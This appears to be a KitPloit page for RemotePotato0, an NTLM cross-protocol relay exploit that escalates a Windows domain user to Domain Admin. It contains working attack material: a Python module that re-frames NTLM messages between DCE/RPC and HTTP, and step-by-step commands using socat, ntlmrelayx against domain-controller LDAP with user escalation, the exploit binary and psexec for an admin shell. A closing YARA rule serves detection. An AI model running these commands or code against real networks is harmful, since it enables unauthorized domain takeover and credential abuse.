Just another "Won't Fix" [Windows Privilege Escalation](<https://www.kitploit.com/search/label/Windows%20Privilege%20Escalation> "Windows Privilege Escalation" ) from User to Domain Admin.
RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin.
Briefly:
It abuses the DCOM activation service to trigger an NTLM authentication from the user currently logged on to the target machine. You need a shell in session 0 (e.g. a WinRM or SSH shell) while a privileged user (e.g. a Domain Admin) is logged on in session 1. Once the NTLM type 1 (NEGOTIATE) message is triggered, a cross-protocol [relay](<https://www.kitploit.com/search/label/Relay> "relay" ) server receives it over DCE/RPC and forwards it to a third resource, unpacking the RPC framing and re-packing the NTLM messages over HTTP. On the receiving end you can set up a further relay node (e.g. ntlmrelayx) or relay directly to a privileged resource.
Full details at --> <https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop>
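The unpack/re-pack step described above, as an added example (not RemotePotato0's or Impacket's code): an NTLMSSP NEGOTIATE arriving in the sec_trailer of a DCE/RPC bind is lifted out and re-issued as an HTTP `Authorization` header, and the CHALLENGE from the target's HTTP 401 is wrapped back into a bind_ack that reuses the original call_id. PDU layouts follow C706/MS-RPCE and message layouts MS-NLMP; the bind/bind_ack bodies, negotiate flags and server challenge are constructed sample data, and IObjectExporter is assumed as the interface the victim binds to.

```python
"""Cross-protocol NTLM relay framing: DCE/RPC sec_trailer <-> HTTP NTLM headers.
Constructed example, not RemotePotato0's or Impacket's code."""
import base64
import struct
import uuid

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
RPC_C_AUTHN_WINNT = 10                  # sec_trailer auth_type for NTLMSSP
RPC_C_AUTHN_LEVEL_CONNECT = 2
PTYPE_BIND, PTYPE_BIND_ACK = 11, 12
HDR = "<BBBB4sHHI"                      # ver, minor, ptype, pfc_flags, drep, frag_len, auth_len, call_id
HDR_LEN = struct.calcsize(HDR)          # 16
SEC_TRAILER = "<BBBBI"                  # auth_type, auth_level, auth_pad_length, reserved, context_id
SEC_TRAILER_LEN = struct.calcsize(SEC_TRAILER)  # 8
NDR_SYNTAX = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860").bytes_le + struct.pack("<I", 2)
# IObjectExporter (OXID resolver interface) as the sample abstract syntax: an assumption of this example
IOBJECTEXPORTER = uuid.UUID("99fcfec4-5260-101b-bbcb-00aa0021347a").bytes_le + struct.pack("<I", 0)


def build_rpc_pdu(ptype, body, ntlm_blob, call_id=1, context_id=0):
    """One connection-oriented DCE/RPC PDU: header + body + sec_trailer + auth value.
    The body is padded to a 4-byte boundary and the pad recorded in auth_pad_length."""
    pad_len = (-len(body)) % 4
    body += b"\x00" * pad_len
    trailer = struct.pack(SEC_TRAILER, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_CONNECT, pad_len, 0, context_id)
    frag_len = HDR_LEN + len(body) + SEC_TRAILER_LEN + len(ntlm_blob)
    hdr = struct.pack(HDR, 5, 0, ptype, 0x03, b"\x10\x00\x00\x00", frag_len, len(ntlm_blob), call_id)
    return hdr + body + trailer + ntlm_blob


def extract_ntlm_from_rpc(pdu):
    """Return (ptype, call_id, ntlmssp_blob); ValueError on anything malformed.
    Lengths are validated before slicing so a hostile PDU cannot misalign the parse."""
    if len(pdu) < HDR_LEN:
        raise ValueError("short PDU")
    ver, _, ptype, _, _, frag_len, auth_len, call_id = struct.unpack(HDR, pdu[:HDR_LEN])
    if ver != 5 or frag_len != len(pdu):
        raise ValueError("bad version or frag_length")
    if auth_len == 0 or HDR_LEN + SEC_TRAILER_LEN + auth_len > frag_len:
        raise ValueError("missing or oversized auth trailer")
    off = frag_len - auth_len - SEC_TRAILER_LEN
    auth_type = struct.unpack(SEC_TRAILER, pdu[off:off + SEC_TRAILER_LEN])[0]
    if auth_type != RPC_C_AUTHN_WINNT:
        raise ValueError("auth_type %d is not NTLMSSP" % auth_type)
    blob = pdu[off + SEC_TRAILER_LEN:]
    if not blob.startswith(NTLMSSP_SIGNATURE):
        raise ValueError("auth value lacks NTLMSSP signature")
    return ptype, call_id, blob


def ntlm_message_type(blob):
    """MS-NLMP MessageType: 1 NEGOTIATE, 2 CHALLENGE, 3 AUTHENTICATE."""
    return struct.unpack_from("<I", blob, 8)[0]


def ntlm_to_http_header(blob):
    """Re-pack an NTLMSSP blob as the HTTP header the other side of the relay expects."""
    name = "WWW-Authenticate" if ntlm_message_type(blob) == 2 else "Authorization"
    return "%s: NTLM %s" % (name, base64.b64encode(blob).decode())


def ntlm_from_http_header(header):
    """Pull the NTLMSSP blob out of 'Authorization: NTLM x' / 'WWW-Authenticate: NTLM x'."""
    value = header.partition(":")[2] if ":" in header else header
    scheme, _, token = value.strip().partition(" ")
    if scheme.upper() != "NTLM" or not token:
        raise ValueError("not an NTLM header")
    blob = base64.b64decode(token)
    if not blob.startswith(NTLMSSP_SIGNATURE):
        raise ValueError("token is not NTLMSSP")
    return blob


def relay_bind_to_http(bind_pdu):
    """Victim -> relay: NEGOTIATE arrives in a bind; emit the outgoing HTTP request header.
    The call_id is returned so the answer can be sent on the same RPC exchange."""
    ptype, call_id, blob = extract_ntlm_from_rpc(bind_pdu)
    if ptype != PTYPE_BIND or ntlm_message_type(blob) != 1:
        raise ValueError("expected a bind PDU carrying NTLMSSP NEGOTIATE")
    return call_id, ntlm_to_http_header(blob)


def relay_http_challenge_to_bind_ack(www_authenticate, call_id):
    """Target -> victim: the CHALLENGE from the HTTP 401 goes back inside a bind_ack."""
    blob = ntlm_from_http_header(www_authenticate)
    if ntlm_message_type(blob) != 2:
        raise ValueError("expected NTLMSSP CHALLENGE")
    return build_rpc_pdu(PTYPE_BIND_ACK, bind_ack_body(), blob, call_id)


# --- constructed sample messages --------------------------------------------
def sample_bind_body():
    """bind body with one presentation context: IObjectExporter over NDR."""
    head = struct.pack("<HHIB3x", 4280, 4280, 0, 1)       # max_xmit, max_recv, assoc_group, n_context
    return head + struct.pack("<HBx", 0, 1) + IOBJECTEXPORTER + NDR_SYNTAX


def bind_ack_body(assoc_group=0x1234):
    """bind_ack body: limits, assoc group, sec_addr "135", one accepted result."""
    body = struct.pack("<HHI", 4280, 4280, assoc_group) + struct.pack("<H", 4) + b"135\x00"
    body += b"\x00" * ((-len(body)) % 4)                  # p_result_list is 4-byte aligned
    return body + struct.pack("<B3x", 1) + struct.pack("<HH", 0, 0) + NDR_SYNTAX


def sample_negotiate(flags=0xE2088297):
    """Minimal NEGOTIATE: empty domain/workstation, offsets point past the 32-byte fixed part."""
    return NTLMSSP_SIGNATURE + struct.pack("<II", 1, flags) + struct.pack("<HHI", 0, 0, 32) * 2


def sample_challenge(server_challenge=b"\x11" * 8, flags=0xE28A8215):
    """Minimal CHALLENGE: empty TargetName/TargetInfo, 48-byte fixed part."""
    return (NTLMSSP_SIGNATURE + struct.pack("<I", 2) + struct.pack("<HHI", 0, 0, 48)
            + struct.pack("<I", flags) + server_challenge + b"\x00" * 8 + struct.pack("<HHI", 0, 0, 48))


if __name__ == "__main__":
    pdu = build_rpc_pdu(PTYPE_BIND, sample_bind_body(), sample_negotiate(), call_id=7)
    call_id, header = relay_bind_to_http(pdu)
    print(header)                                          # Authorization: NTLM TlRMTVNTUAABAAAA...
    ack = relay_http_challenge_to_bind_ack(ntlm_to_http_header(sample_challenge()), call_id)
    print(extract_ntlm_from_rpc(ack)[:2])                  # (12, 7)
```

The third leg, carrying the AUTHENTICATE (type 3) from the victim's auth3 PDU into the second HTTP request, is the same extract/re-pack with a different ptype and is left out; the framing is the only thing that changes between the two protocols, the NTLMSSP blobs themselves are passed through untouched.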
**Example**
Attacker machine (192.168.83.130):

    sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 &
    sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1

The socat forwarder is needed because the victim's DCOM client performs OXID resolution against port 135 of the attacker host; socat bounces that connection back to RemotePotato0's rogue OXID resolver listening on port 9998 of the victim. ntlmrelayx then receives the authentication over HTTP and relays it to LDAP on the domain controller, where `--escalate-user` grants `winrm_user_1` elevated rights.

Victim machine (192.168.83.131):

    .\RemotePotato0.exe -r 192.168.83.130 -p 9998

`-r` is the attacker host the relay is directed to, `-p` the port on which the rogue OXID resolver listens (the socat target above).

Victim Domain Controller (192.168.83.135):

Enjoy a shell (e.g. psexec) as Enterprise Admin on the domain controller ;)

    psexec.py 'SPLINTER/winrm_user_1:<password>@192.168.83.135'

(`<password>` stands for the password of winrm_user_1, which is obfuscated in the source page.)
**Demo**
[Demo GIF](<https://1.bp.blogspot.com/-i-3pnPRIowA/YOTpzCKLGII/AAAAAAAAhkk/-xBaxRDITSI4RBOmknb5R7aLsnQngrtjwCNcBGAsYHQ/s1920/RemotePotato0_1_demo.gif>)
**Detection**
YARA rule to detect the RemotePotato0 binary:

```yara
rule SentinelOne_RemotePotato0_privesc {
    meta:
        author = "SentinelOne"
        description = "Detects RemotePotato0 binary"
        reference = "https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop"

    strings:
        $import1 = "CoGetInstanceFromIStorage"
        $istorage_clsid = "{00000306-0000-0000-c000-000000000046}" nocase wide ascii
        $meow_header = { 4d 45 4f 57 }
        $clsid1 = "{11111111-2222-3333-4444-555555555555}" nocase wide ascii
        $clsid2 = "{5167B42F-C111-47A1-ACC4-8EABE61B0B54}" nocase wide ascii

    condition:
        (uint16(0) == 0x5A4D) and $import1 and $istorage_clsid and $meow_header and 1 of ($clsid*)
}
```
**Authors**
* [Antonio Cocomazzi](<https://twitter.com/splinter_code> "Antonio Cocomazzi" )
* [Andrea Pierini](<https://twitter.com/decoder_it> "Andrea Pierini" )
**Credits**
* [Impacket](<https://github.com/SecureAuthCorp/impacket> "Impacket" )
**[Download RemotePotato0](<https://github.com/antonioCoco/RemotePotato0> "Download RemotePotato0" )**
Source: KitPloit, <http://www.kitploit.com/2021/07/remotepotato0-just-another-wont-fix.html>, published 2021-07-11.